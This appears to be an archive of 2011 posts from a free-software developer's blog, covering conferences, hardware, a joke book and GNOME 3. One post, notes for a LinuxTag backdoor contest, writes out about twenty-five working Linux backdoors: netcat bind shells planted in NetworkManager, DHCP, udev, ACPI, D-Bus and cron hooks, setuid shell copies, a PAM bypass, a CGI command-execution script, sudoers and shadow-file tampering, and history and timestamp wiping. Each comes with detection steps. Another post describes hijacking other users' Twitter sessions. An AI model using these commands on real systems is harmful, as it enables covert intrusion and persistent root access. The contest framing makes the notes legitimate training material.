Category: lang:en

CHIS-ERA conference 2011 in Cork

While being in Ireland, I had the great opportunity of attending the CHIS-ERA strategic conference 2011 in Cork. Never heard of it? Neither have I. It’s a conference of European academic funding bodies to project and discuss future work and the direction of the work to be funded. Hence, it had many academics or industrial research people that talked about their vision for the next few years. If I got it correctly, the funding bodies wanted some input on their new “Call” which is their next big pile of money they throw at research.

The two broad topics were “Green ICT” and “From Data to Knowledge“. And both subjects were actually interesting. But due to the nature of the conference, many talks were quite high level and a bit too, say, visionary for my taste. But it had some technical talks which I think were displaced and given by poor Post-Docs that needed to have a presentation on their record to impress their supervisor or funding body.

CHIS-ERA Flower
However, for the Green IT part, almost all the speakers highlighted how important it was to aim for “Zero Power ICT”, because the energy consumption of electronic devices would shoot up as it did the last decade or so. But it hadn’t necessarily been much of problem, because Moore’s Law would save us a bit: We knew that in a couple of month, we could place the same logic onto half the chip which would then, according to the experts, use half the energy. However, that wouldn’t hold anymore in a decade or two, because we would reach a physical limit and we needed new solutions to the problem.

Some proposed to focus on specialised ICs that are very efficient or could be turned off, some others proposed to build probabilistic architectures because most of time a very correct result wouldn’t matter or to focus research on new materials like nanotubes and nanowires. The most interesting suggestion was to exploit very new non volatile memory technologies using spintronic elements. The weirdest approach was to save energy by eliminating routers on the Internet and have a non routing Internet. The same guy proposed to cache content on the provider as if it wasn’t done already by ISPs.

After the first day, we had a very nice trip to the old Jameson Distillery in Midleton. It started off with a movie telling us the story about Jameson coming to Ireland and making Whiskey. It didn’t forget to mention that Irish Whiskey was older and of course better than the Scottish and the tour around the old buildings were able to tell us what makes Irish Whiskey way better than the Scottish. Funnily enough, they didn’t tell us that the Jameson guy was actually Scottish πŸ˜‰ I do have to admit that I like the Irish Whiskey though πŸ™‚ The evening completed with a very nice and fancy meal in a nice Restaurant called Ballymaloe. I think I never dined with so many pieces of cutlery in front of me…

CHIST-ERA D2K visualisation
The second day was about “From Data to Knowledge” and unfortunately, I couldn’t attend every lecture so I probably missed the big trends. When I heard that Natural Language Processing and Automatic Speech Recognition were as advanced as being able to transcribe a spoken TV or radio news show with a 5% error rate, I was quite interested. Because in my world, I can’t even have the texts that I write corrected because I need to use ispell which doesn’t do well with markup or other stuff. Apparently, there is a big discrepancy between the bleeding edge of academic research and freely available tools πŸ™ I hope we can close this gap first, before tackling the next simultaneous translation tool from Urdu to Lowgerman…

CCCamp 2011


It happened again! The Chaos Communication Camp took place a couple of weeks ago near Berlin. I was all excited to go although I had to miss the last days of the Desktop Summit.

The weather was mostly nice and the atmosphere, especially at night, was really fantastic. Everybody was really nice and there was so much creativity all over the venue that it was really hard to not start to make or hack on something.

While it had many very interesting things to be seen, I think to most amazing machine on the ground was a “Crepes printer”. Some austrian dude built a machine which would make you a fresh crepe. Including some chocolate sauce! Just right next the that were some friends that intend to launch a sattelite and already had their radio equipment ready. With their massive antenna they spoke to the moon and measured the reflections coming back.

The participants also got a fancy badge called “r0ket“. It’s an amazing device and people did awesome stuff with it immediately. Given the presence of 3D printers and lasercutters, people added all sorts of extensions to the r0ket. But some enhanced their r0ket with good old knitting goodness.

The whole CCCamp, taking place on an old russian airbase, was themed very aeronautical so everything was somehow related to space travel or rocket science. It also had many talks on those subjects which I didn’t attend a lot. I was too busy hacking or socialising.

http://www.youtube.com/watch?v=teiwdhHYIQk

You can only see a tiny fraction of the many artisty stuff it had on the ground. But you do see an old MIG which got pwned along with a spacy car. He got trolled quite well, I’d say but decide for yourself:

You can try to grasp the atmosphere by looking at these areal shots:

You can see some more pictures and press articles in the CCCamp Wiki. The next Camp will be “Observe. Hack. Make. 2013.” and I’m very much looking forward to attend it.

Spare Thinkpad x60, x60s, x61 or x61s anybody?

Dear Lazyweb,

my beloved laptop broke down πŸ™ It’s an x61s and its backlight is not working anymore. I replaced the inverter card and the LCD cable to no avail. It can now only be the last and most expensive part: The LCD panel.

Hence my question: Do you know where to get hold of a spare x60, x60s, x61 or x61s with a working LCD panel? If so, please contact me.

Thanks.

Desktop Summit 2011 in Berlin

This years GUADEC^W DesktopSummit took place in Berlin. Sure thing that I attended πŸ™‚ Due to loads of stuff happening meanwhile, I didn’t come around to actually write about it. But I still want to mention a few things.

It was, like always, pretty nice to see all the faces again and catch up. The venue was almost excellent and provided good lecture halls and infrastructure, although the wireless was a bit flaky and spots to sit down and get together were sparse. Anyway, I have never seen so many actual users or wannabe users. Being in the heart of Germany’s capital definitely helped to make ourselves visible. Funnily enough, I met some folks who I chatted up during LinuxTag while I was presenting GNOME. I invited them to come to the DesktopSummit and so they did \o/

There were many talks and I didn’t see most of them. In fact, I was volunteering and meeting people so I couldn’t attend many lectures. But there was nothing I regret not having seen. The ones I did see were interesting enough, but not ground breaking. There’s a good summary over here.

We tried to record the talks but for some technical reasons it didn’t work out of the box. The network was too slow and no disks were available. We convinced the guy in charge to make us buy disks which eventually got used but I actually don’t know whether the lectures will be released at all.

A nice surprise was Intel giving away ExoPCs. In return they required you to sit and listen to presentations about their Appstore thingy called “AppUp“. Apparently a technology that tries to resemble OBS (because of distributing software via the web) and .debfiles+Synaptic (because of distributing software with a native GUI) with an additional payment layer in between. But it fails big time to do so. Not only can it not build binaries out of the sources that you give it, but it also can’t track dependencies. Welcome to 2011. Needless to say that it’s heavily targeted for Windows. Double fail that you can’t build Windows software for their store thing without having a Windows platform (and development tools) yourself.

The PC itself is neat. It’s a full tablet with only one soft key. The MeeGo version that came with it was out of date and updating was a major pain in the afternoon. It involved getting a USB keyboard because the OnScreenKeyboard would of course not show up if you open a terminal. And you needed a keyboard, because you can of course not update the software with that MeeGo version. There is no software management application at all. And most certainly, Intel’s new AppUp thing is not included in the latest and greatest release. In fact, it’s not even easily installable as it involves googling for the RPM file to be manually installed. By now I talked to Intel engineers and it seems that an actual vendor is supposed to integrate their version of the AppUp thing in the rest of the OS. So Intel doesn’t see itself in the position to do this. Other weird glitches include the hardware: While the ExoPC has a rotation sensor, it would be way to boring if it worked; so it doesn’t. And the hardware turns itself off after a while. Just like that. It feels like we have at least 3 years of engineering left before we can start dreaming of being able to ship a tablet platform that is ready for a day to day use. I have to note that the content centric UI approach is definitely very handy. Let’s hope it improves by fixing all those tiny things around the actual UI.

The discussion about a joint conference was bubbling up again. Of course. The main argument against a joint conference seems to be that it is considered to slow GNOME’s development down if we meet together, because we have to give time to the other people and cannot do our own program meanwhile. There are probably many variations of that argument, including that we do not collaborate anyway, so let’s rather not invest time in a joint conference.

While I do agree that the current form of the conference is not necessarily optimal, I don’t think that we should stop meeting up together. At the end of day, multiple (desktop) implementations or technologies are just pointless duplications. So let’s rather try to unify and be a unity (haha, pun intended) instead of splitting up further. I am very well aware of the fact that it’s technically unrealistic right now. But that’s the future we endeavour and we should work on making it possible, not work against it. So we don’t necessarily need to have a fully joint conference. After all, our technologies do differ quite substantially, depending on how you look at it. But let’s give each other the opportunity to learn about other technologies and speak to the key people. We might not fully make use of these opportunities yet, but if we design the conferences in a way that the camps have enough time to handle their internal issues and before or afterwards do a joint thing, then no harm is done if opportunities weren’t taken.

Another hot topic were Copyright Assignments. There was a panel made up of interesting people including Mark Shuttleworth. The discussion was alright, but way too short. They barely had 45 minutes which made it less than 15 minutes each. Barely enough to get a point across. And well, I didn’t really understand the arguments *for* giving away any of your rights. It got really weird as Mark tried to make another point: It would be generous if a contributor donated the code to the company and the participants should take into account that generosity would be a strong factor contributors would strive for. I haven’t seen that point being discussed anywhere yet, so let me start by saying that it is quite absurd. What could be more generous than giving your code to the public and ensuring that it stays freely available?! Just to be very clear: The GPL enables you to effectively do exactly that: Release code and ensure that it remains free.

I was delighted to see that the next GUADEC will take place in A Corunha. I’d rather have gone to Prague though. But maybe the Czech team can be motivated to apply again the next time.

Pwnitter

Uh, I totally forgot to blog about a funny thing that happened almost a year ago which I just mentioned slightly *blush*. So you probably know this Internet thing and if you’re one of the chosen and carefully gifted ones, you confused it with the Web. And if you’re very special you do this Twitter thing and expose yourself and your communications pattern to some dodgy American company. By now, all of the following stuff isn’t of much interest anymore, so you might as well quit reading.

It all happenend while being at FOSS.in. There was a contest run by Nokia which asked us to write some cool application for the N900. So I did. I packaged loads of programs and libraries to be able to put the wireless card into monitor mode. Then I wiretapped (haha) the wireless and sniffed for Twitter traffic. Once there was a Twitter session going on, I sniffed the necessary authentication information was extracted and a message was posted on the poor user’s behalf. I coined that Pwnitter, because it would pwn you via Twitter.

That said, we had great fun at FOSS.in, where nearly everybodies Twitter sessions got hijacked πŸ˜‰ Eventually, people stopped using plain HTTP and moved to end to end encrypted sessions via TLS.

Anyway, my program didn’t win anything because as it turned out, Nokia wanted to promote QML and hence we were supposed to write something that makes use of that. My program barely has a UI… It is made up of one giant button…

Despite not getting lucky with Nokia, the community apparently received the thing very well.

So there is an obvious big elephant standing in the room asking why would you want to “hack” Twitter. I’d say it’s rather easy to answer. The main point being that you should use end to end encryption when doing communication. And the punchline comes now: Don’t use a service that doesn’t offer you that by default. Technically, it wouldn’t be much of a problem to give you an encrypted link to send your messages. However, companies tend to be cheap and let you suffer with a plain text connection which can be easily tapped or worse: manipulated. Think about it. If the company is too frugal to protect your communication from pimpled 13yr olds with a wifi card, why would you want to use their services?

By now Twitter (actually since March 2011, making it more than 6 month ago AFAIK) have SSL enabled by default as far as I can tell. So let’s not slash Twitter for not offering an encrypted link for more than 5 years (since they were founded back in 2006). But there are loads of other services that suffer from the very same basic problem. Including Facebook. And it would be easy to adapt the existing solution stuff like Facebook, flickr, whatnot.

A noteable exception is Google though. As far as I can see, they offer encryption by default except for the search. If there is an unencrypted link, I invite you to grab the sources of Pwnitter and build your hack.

If you do so, let me give you an advise as I was going nuts over a weird problem with my Pwnitter application for Maemo. It’s written in Python and when building the package with setuptools the hashbang would automatically be changed to “#!/scratchbox/tools/bin/python“, instead of, say, “/usr/bin/python“.

I tried tons of things for many hours until I realised, that scratchbox redirects some binary paths.

However, that did not help me to fix the issue. As it turned out, my problem was that I didn’t depend on a python-runtime during build time. Hence the build server picked scratchbox’s python which was located in /scratchbox/bin.

eMobile, NetworkManager and You

While being in Ireland I happened to have access to an Irish eMobile SIM card and USB modem. The modem was a Huawei e173 and it worked perfectly well on a recent Ubuntu installation. Even the USB modeswitch worked out of the box πŸ™‚

However, I couldn’t dial up with any of my Linux machines while I double checked that it worked on Windows using their software. The NetworkManager wouldn’t list the settings for eMobile and every other setting from Meteor didn’t work. The NetworkManager in debug mode revealed that the connection got cut just after the PPPd requested configuration settings. I tried to change the PPPd settings for hours with no success.

Funnily enough, not even my N900 could connect to the Internet using the predefined connection. That was named “Meteor DATA” and used “data.mymeteor.ie” as APN.

Also very interesting, that I couldn’t find the neccessary dial up information *anywhere* on the web. The eMobile.ie site is utterly unstructured and didn’t allow me to find any sensible information at all. I sent them an email but I still haven’t receive any answer.

After having had access to a Windows box with their software again, I found out that it uses the APN: “broadband.eircommbb.ie“. Putting that into the NetworkManager makes it dial up *yay*!

So I hope this information is useful for anybody wanting to use their eMobile SIM Card with their Linux based system. I also prepared a patch for mobile-broadband-provider-info so you should be able to click the connection via NetworkManager easily πŸ™‚

My new book: Lorem Ipsum

Lenny already posted the news, so it’s about time and a real pleasure for me to present my new book: Lorem Ipsum.

It was a long ride for me and I want to thank all my supporters for allowing me to work through nights and weekends, potentially neglecting my friends and family for a while. But now it’s finally done and I’m very happy for the book to hit the (electronic and real-life-bookstore) bookshelves.

Amazon.com or if you prefer on Amazon.de. But you get more discount if you buy Support independent publishing: Buy this book on Lulu.here. So get it while it’s hot!

Product Details

ISBN 978-1-257-04887-8
Copyright Tobias Mueller
Published April 19, 2011
Language Latin
Pages 112
Binding Hardcover (casewrap)
Interior Ink Black & white
Dimensions (cm) 15.2 wide Γ— 22.9 tall

Since the exterior contributes a lot to a proper reading experience, care was taken about nice lookings and well proportioned dimensions. Obviously, it’s a hard cover as well and no cheap paper back. So don’t only judge by the content, but also by the lookings. Also, if you look close enough, you will notice a few easter eggs, that I’ve hidden in the book.

So have a lot of fun enjoying the book πŸ™‚

As a courtesy, I’ll provide the table of contents and a first page for reading.

An audio book is almost produced as well, you can have a peak at half of the first chapter here.

Your browser does not support the audio element. Or this stupid wordpress instance filters out the audio tags :-\

LinuxCon Japan 2011

Thanks to the Linux Foundation I was able to attend LinuxCon 2011 in Japan.

I used the opportunity to distribute GNOME 3 DVD Images and leaflets during my talk about GNOME 3 which was well enough received I’d say. While I collected a lot of experience approaching people and telling them about all the niceties that GNOME 3 offers over the last few month, I really had too little time to tell all the brilliant things about our new GNOME. Anyway, it was nice to be on the very same schedule as the very important Linux people like Greg KH, Linus or Lenny.

The conference itself was hosted in a very spacious building: The Pacifico in Yokohama. One could see that impressive building from our hotel room. Just nice. The conference was well organised and the provided amenities such as food and drinks were good enough. I was particularly impressed by the simultaneous translations that were done by two elderly men.

The talks were generally interesting, probably because I haven’t been to a kernel focused conference and I found it interesting to get new input. My favourites were the Kernel Developer Panel were one could pose question onto the Kernel people face to face and the talks about the social aspect of Kernel development.

Despite all the trouble in Japan, we had a very good time and in fact, there weren’t many indicators to the earthquake or the nuclear catastrophe. The most annoying inconveniences probably were the turned off elevators. Other than that, we didn’t really see any disrupted services or chaos or problems at all. Traveling in Japan is a real pleasure as the train system is gorgeous and the cities are very well mapped. You encounter a city map just about every other corner and it’s very detailed and helpful. Japanese people are extraordinarily friendly and although there is a language barrier, they try to understand and help you. The downside is, that Japan is quite expensive. Especially the train system, but also lodging and food. However, the quality is very good, so it’s probably worth the money.

I’m looking forward to attend the next LinuxCon, maybe even in Japan πŸ™‚

LinuxTag Hacking Contest Notes

As I wrote the other day, I have been to LinuxTag in Berlin. And Almost like last year a Hacking contest took place.

LinuxTag 2011 - Hacking Contest

The rules were quite the same: Two teams play against each other, each team having a laptop. The game has three rounds of 15 minutes each. In the first round the teams swap their laptops so that you have the opponents machine. You are supposed to hide backdoors and other stuff. In the second round the laptops are swapped back and you have to find and remove these backdoors. For the third round the laptops are swapped once again and you can show off what backdoors were left in the system.

So preparation seems to be the obvious key factor for winning. While I did prepare some notes, they turned out to not be very good for the actual contest, because they are not structured well enough.

Since the game has three rounds, it makes sense to have a structure with three parts as well. Hence I produced a new set of notes with headlines for each backdoor and three parts per section. Namely Hacking, Fixing and Exploiting.

The notes weren’t all ready just before the contest and hence we didn’t score pretty well. But I do think that our notes are quite cool by now though. Next time, when we’re more used to the situation and hopefully learned through suffering to not make all those tiny mistakes we did, we might play better.

So enjoy the following notes and feel free to give feedback.

Set Keyboard to US English:

setxkbmap us
export HISTFILE=/dev/null
ln -sf ~/.bash_history /dev/null
ln -sf ~/.viminfo /dev/null

while true; do find / -exec touch {} \; ; sleep 2; done


1  passwd new user

Remote
root


1.1  Hacking

nano /etc/passwd

copy and paste root user to a new user, i.e. hackr.

sudo passwd hackr


1.2  Fixing

grep :0: /etc/passwd


1.3  Exploiting

ssh hackr@localhost


2  dePAMify

Remote
root


2.1  Hacking

cd /lib/security/
cp pam_permit.so pam_deny.so
echo > /etc/pam.d/sshd
/etc/init.d/sshd restart


2.2  Fixing

too hard


2.3  Exploiting

ssh root@localhost

enter any password


3  NetworkManager

Remote
root


3.1  Hacking

nano /etc/NetworkManager/dispatcher.d/01ifupdown <<EOF
nc.traditional -l -p 31346 -e /bin/bash &
cp /bin/dash /etc/NetworkManager/dhclient
chmod +s /etc/NetworkManager/dhclient
EOF


3.2  Fixing

ls /etc/NetworkManager/dispatcher.d/


3.3  Exploiting

less /etc/NetworkManager/dispatcher.d/

Disconnect Network via NetworkManager

Connect Network via NetworkManager

/etc/NetworkManager/dhclient

netcat localhost 31346


4  SSHd

Remote
root


4.1  Hacking

su -
ssh-keygen
cd
cat .ssh/id_rsa.pub | tee /etc/ssh/authorized_keys
cat .ssh/id_rsa | tee /etc/issue.net
cp /etc/ssh/sshd_config /tmp/
nano /etc/ssh/sshd_config <<EOF
AuthorizedKeysFile /etc/ssh/authorized_keys
Banner /etc/issue.net
EOF

/etc/init.d/ssh reload
mv /tmp/sshd_config /etc/ssh/


4.2  Fixing

less /etc/ssh/sshd_config

/etc/init.d/ssh reload


4.3  Exploiting

ssh root@localhost 2> /tmp/root
chmod u=r,go= $_
ssh  -i /tmp/root root@localhost


5  xinetd

Remote
root


5.1  Hacking

cp  /etc/xinetd.d/chargen  /etc/xinetd.d/chargen.bak

nano /etc/xinetd.d/chargen <<EOF

disable = no
DELETE type = INTERNAL
server = /bin/dash
EOF

/etc/init.d/xinetd restart

mv /etc/xinetd.d/chargen.bak  /etc/xinetd.d/chargen


5.2  Fixing

grep disable  /etc/xinetd.d/* | grep no


5.3  Exploiting

nc localhost chargen


6  Apache

Remote
root

Needs testing


6.1  Hacking

nano /etc/apache2/sites-enabled/000-default

DocumentRoot /
Make <Directory />  and copy allowance from below

/etc/init.d/apache2 restart

touch /usr/lib/cgi-bin/fast-cgid
chmod a+rwxs $_
touch /usr/lib/cgi-bin/fast-cgid.empty
chmod a+rwxs $_
nano /usr/lib/cgi-bin/fast-cgid <<EOF
    #!/bin/bash
    IFS=+
    $QUERY_STRING
EOF

nano /etc/sudoers <<EOF
www-data ALL=NOPASSWD: ALL
EOF


6.2  Fixing

ls -l /usr/lib/cgi-bin/

nano /etc/apache2/sites-enabled/*

/etc/init.d/apache2 restart


6.3  Exploiting

links2 http://localhost/  # Remote file access
links2 http://localhost/cgi-bin/fast-cgid?id # Remote command execution
grep NOPASS /etc/sudoers  # local privilege escalation
links2 http://localhost/cgi-bin/fast-cgid?sudo+id # Remote root command execution

nano /usr/lib/cgi-bin/fast-cgid.empty <<EOF
/bin/dash
EOF

/usr/lib/cgi-bin/fast-cgid.empty # local privilege escalation


7  screen

Local
root


7.1  Hacking

sudo chmod u+s /bin/dash
sudo mkdir -p /etc/screen.d/user/
sudo chmod o+rwt /etc/screen.d/user/
# NOW AS USER!!1
SCREENDIR=/etc/screen.d/user/ screen
# IN THE SCREEN
dash
C-d


7.2  Fixing

ls -l /var/run/screen
rm -rf /var/run/screen/*

sudo lsof | grep -i screen | grep FIFO
rm these files


7.3  Exploiting

SCREENDIR=/etc/screen.d/user/ screen -x


8  hidden root dash

Local
root


8.1  Hacking

cp /bin/dash /usr/bin/pkexec.d
chmod +s !$
cp /bin/dash /etc/init.d/powersaved
chmod +s !$


8.2  Fixing

find / \( -perm -4000 -o -perm -2000 \) -type f -exec ls -la {} \;

rm these files


8.3  Exploiting

/etc/init.d/powersaved

/usr/bin/pkexec.d


9  DHCP Hook

Local
Remote
root


9.1  Hacking

nano /etc/dhcp3/dhclient-exit-hooks.d/debug <<EOF
nc.traditional -l -p 31347 &
cp /bin/dash /var/run/dhclient
chmod +s /var/run/dhclient
EOF


9.2  Fixing

ls -l /etc/dhcp3/dhclient-exit-hooks.d/
ls -l /etc/dhcp3/dhclient-enter-hooks.d/


9.3  Exploiting

Reconnect Network via DHCP

/var/run/dhclient

netcat localhost 31347


10  ConsoleKit

Local
root

Switchen VTs is triggered locally only, although one might argue that switching terminals is done every boot. Hence it’s kinda automatic.


10.1  Hacking

sudo -s
touch /usr/lib/ConsoleKit/run-seat.d/run-root.ck
chmod a+x /usr/lib/ConsoleKit/run-seat.d/run-root.ck
nano /usr/lib/ConsoleKit/run-seat.d/run-root.ck

#!/bin/sh

chmod u+s /bin/dash
nc.traditional -l -p 31337 -e /bin/dash &


10.2  Fixing

ls /usr/lib/ConsoleKit/run-seat.d/

Only one symlink named udev-acl.ck is supposed to be there.


10.3  Exploiting

ls /usr/lib/ConsoleKit/run-seat.d/

Switch TTY (Ctrl+Alt+F3)

execute /bin/dash

nc IP 31337


11  SIGSEGV

Local
root


11.1  Hacking

echo '|/bin/nc.traditional -l -p 31335 -e /bin/dash' > /proc/sys/kernel/core_pattern


11.2  Fixing

cat /proc/sys/kernel/core_pattern
echo core > /proc/sys/kernel/core_pattern


11.3  Exploiting

ulimit -c unlimited

sleep 1m & pkill -SEGV sleep

nc localhost 31335


12  nc wrapper

Remote
Local
root


12.1  Hacking

setxkbmap us
cd /tmp/
cat > dhclient.c <<EOF
#include <unistd.h>

int main (int argc, char* args[]) {
    int ret = fork ();
    if (ret == 0) {
        chmod("/bin/dash", 04755);
        execlp ("/usr/bin/nc.traditional", "nc.traditional",
            "-l" ,"-p", "31339", "-e", "/bin/dash", (char*) NULL);
    } else
        execvp("/sbin/dhclient6", args);
    return 0;
}
EOF

/etc/init.d/networking stop                # Or disable via NotworkManager
make dhclient
cp /sbin/dhclient /sbin/dhclient6
cp dhclient /sbin/dhclient
cp dhclient /etc/cron.hourly/ntpdate
cp dhclient /sbin/mount.btrfs
cp dhclient /usr/lib/cgi-bin/cgi-handler
chmod ug+s /sbin/mount.btrfs /usr/lib/cgi-bin/cgi-handler
rm dhclient.c
/etc/init.d/networking start               # Or enable via NotworkManager


12.2  Fixing


12.3  Exploiting


12.3.1  real dhclient

Disconnect with Network Manager

Connect with NetworkManager

dash

nc localhost 31339


12.3.2  cron

Just wait. Or reboot.


13  evbug

Remote

Writes Keycodes to syslog.
Type: 1 are keypresses, and “code” is the actual keycode.
evtest shows which key maps to which keycode.

Unfortunately, Debian does not seem to have that module.


13.1  Hacking

modprobe evbug
%FIXME: Maybe pull netconsole

nano /etc/modprobe.d/blacklist.conf


13.2  Fixing

modprobe -r evbug


13.3  Exploiting

dmesg | grep  "Type: 1"


14  Vino

Remote


14.1  Hacking

sudo -s
xhost +
nohup /usr/lib/vino/vino-server &
vino-preferences


14.2  Fixing

vino-preferences

ps aux | grep vnc


14.3  Exploiting

vncviewer IP


15  GDM InitScript

Local
Remote
root


15.1  Hacking

nano /etc/gdm/Init/Default <<EOF
cp /bin/dash /etc/gdm/gdm-greeter
chmod +s /etc/gdm/gdm-greeter
nc.traditional -l -p 31345 -e /bin/dash &
EOF


15.2  Fixing

less /etc/gdm/Init/Default


15.3  Exploiting

Log off

Log on

/etc/gdm/gdm-greeter

nc localhost 31345


16  shadow a+rw

Local
root


16.1  Hacking

chmod a+rw /etc/shadow


16.2  Fixing

ls -l /etc/shadow

chmod u=rw,g=r /etc/shadow


16.3  Exploiting

nano /etc/shadow


17  SysV Init Alt+Up

Local
root


17.1  Hacking

touch /etc/init.d/throttle
chmod a+x $_
nano $_ <<EOF
#!/bin/sh
exec </dev/tty13 >/dev/tty13 2>/dev/tty13
exec /bin/bash
EOF

nano /etc/inittab <<EOF
kb::kbrequest:/etc/init.d/throttle
EOF

init q


17.2  Fixing

nano /etc/inittab


17.3  Exploiting

Ctrl+Alt+F1, Alt+Up, Alt+Left


18  SysV Init Ctrl+Alt+Del

Local
root


18.1  Hacking

nano /etc/inittag <<EOF
ca:12345:ctrlaltdel:chmod +s /bin/dash
EOF

init q


18.2  Fixing

nano /etc/inittag


18.3  Exploiting

Ctrl+Alt+F1, Ctrl+Alt+Del, dash


19  SysV Init tty14

Local
root


19.1  Hacking

nano /etc/inittag <<EOF
14:23:respawn:/bin/login -f root </dev/tty14 >/dev/tty14 2>/dev/tty14
EOF

init q


19.2  Fixing

less /etc/inittag


19.3  Exploiting

Ctrl+Alt+F1, Alt+Left


20  DBus Root Service

Local
root


20.1  Hacking

cd /usr/share/dbus-1/system-services/
cp org.freedesktop.org.UPower org.Rootme.Remotely.service
nano org.Rootme.Remotely.service << EOF
[D-BUS Service]
Name=org.Rootme.Remotely
Exec=/bin/nc.traditional -l -p 31343 -e /bin/dash
User=root
EOF

cp org.freedesktop.org.UPower org.Rootme.Locally.service
nano org.Rootme.Locally.service << EOF
[D-BUS Service]
Name=org.Rootme.Locally
Exec=/bin/chmod u+s /bin/dash
User=root
EOF


20.2  Fixing

grep Exec /usr/share/dbus-1/system-services/*.service


20.3  Exploiting

dbus-send -system -print-reply -dest='org.Rootme.Locally' /org/Rootme/Locally org.Rootme.Locally

dbus-send -system -print-reply -dest='org.Rootme.Remotely' /org/Rootme/Remotely org.Rootme.Remotely

nc localhost 31343

dash


21  Crontabs

Local
Remote
root


21.1  Hacking

touch /etc/cron.d/pamd
chmod a+x /etc/cron.d/pamd
nano /etc/cron.d/pamd <<EOF
*/2 * * * *   root  cp /bin/dash /usr/share/gdm/chooser
*/2 * * * *   root  chmod +s /usr/share/gdm/chooser
EOF

touch /etc/cron.d/dhclient
chmod a+x /etc/cron.d/dhclient
nano /etc/cron.d/dhclient <<EOF
*/2 * * * *   root  /sbin/mount.btrfs
EOF


21.2  Fixing

sudo ls -l /var/spool/cron/crontabs/ /etc/cron.*/


21.3  Exploiting

ls -l /etc/cron.d/dhclient /etc/cron.d/pamd /usr/share/gdm/chooser

Wait

/usr/share/gdm/chooser

nc -l localhost 31339


22  udev

Localroot

udev is responsible for devices being attached to Linux.
It is able to trigger commands on certain hardware.
Under the assumption that a Laptop will have a rfkill switch, one could write the following rules.
Note that the commands block, i.e. to hit the second rule, the first program must exist.
udev automatically reloads the rules.


22.1  Hacking

nano /lib/udev/rules.d/99-rfkill.rules <<EOF
SUBSYSTEM=="rfkill", RUN +="/bin/nc.traditional -l -p 31337 -e /bin/sh"
SUBSYSTEM=="rfkill", RUN +="/bin/chmod +s /bin/dash"
EOF


22.2  Fixing

grep RUN /lib/udev/rules.d/* /etc/udev/rules.d/

but too hard


22.3  Exploiting

toggle rfkill via hardware switch

nc localhost 31344

dash


23  ACPI Powerbtn

Local
root


23.1  Hacking

nano /etc/acpi/powerbtn.sh <<EOF
nc.traditional -l -p 31348 -e /bin/sh
/bin/chmod +s /bin/dash
EOF


23.2  Fixing

ls /etc/acpi/

less /etc/acpi/powerbtn.sh


23.3  Exploiting

Press power button

nc localhost 31348

dash


24  PolicyKit GrantAll

Local
root

Note that this reflects policykit 0.96 which has a deprecated config file syntax.


24.1  Hacking

nano /usr/share/polkit-1/actions/org.freedesktop.policykit.policy

change org.freedesktop.policykit.exec to read
    <defaults>
      <allow_any>yes</allow_any>
      <allow_inactive>yes</allow_inactive>
      <allow_active>yes</allow_active>
    </defaults>

pkill polkitd


24.2  Fixing

nano /usr/share/polkit-1/actions/org.freedesktop.policykit.policy

change org.freedesktop.policykit.exec to read
      <allow_any>auth_admin</allow_any>
      <allow_inactive>auth_admin</allow_inactive>
      <allow_active>auth_admin</allow_active>

pkill polkitd


24.3  Exploiting

pkexec id


25  decoy timestamps

No hack in the traditional sense but stuff that one might need to do.


25.1  Hacking

for i in `find /etc/ /bin/ /sbin/ /var/spool/
          /var/run /usr/lib/ConsoleKit /usr/share/dbus-1/ /usr/share/polkit-1/`; do
    touch $i; done
export HISTFILE=/dev/null
rm ~/.*history*


25.2  Fixing


25.3  Exploiting

find / -mtime -1

find / -ctime -1

GNOME3 Release Parties

Oh, I almost forgot about the GNOME 3 Release Party that we had the other week. In fact, I had two times the pleasure of showing off GNOME 3 to the people. The first and official Release Party was held in the Attraktor. We even got mentioned by Heise. The second time was in my university during a self organised seminar.

On both occasions, I had to entertain a good bunch of people (around 15 and 30) and, well, it went at least alrightish, I’d say πŸ˜‰ The second time was a bit confusing, because my Laptop didn’t want to as perform well as I expected so a good bit of improvisation was needed. But it was great fun overall. The goodies, that were provided by the GNOME Foundation, were well received, esp. the T-Shirts.

I showed off the really brilliantly done videos that Jason produced. We demoed and discussed those features and discovered even more stuff on the way. I haven’t really worked much with GNOME3, esp. GNOME Shell before and it’s kinda awkward in the beginning, but I got used to it very quickly. I really like much of it now.

Thanks to the Attraktor for having hosted us. And thanks to the attendees for the nice discussions. I’m looking forward to do some more GNOME3 presentations at coming LinuxTag and other occasions.

Happy GNOME3 everybody!

I am GNOME

Creative Commons Attribution-ShareAlike 3.0 Unported
This work by Muelli is licensed under a Creative Commons Attribution-ShareAlike 3.0 Unported.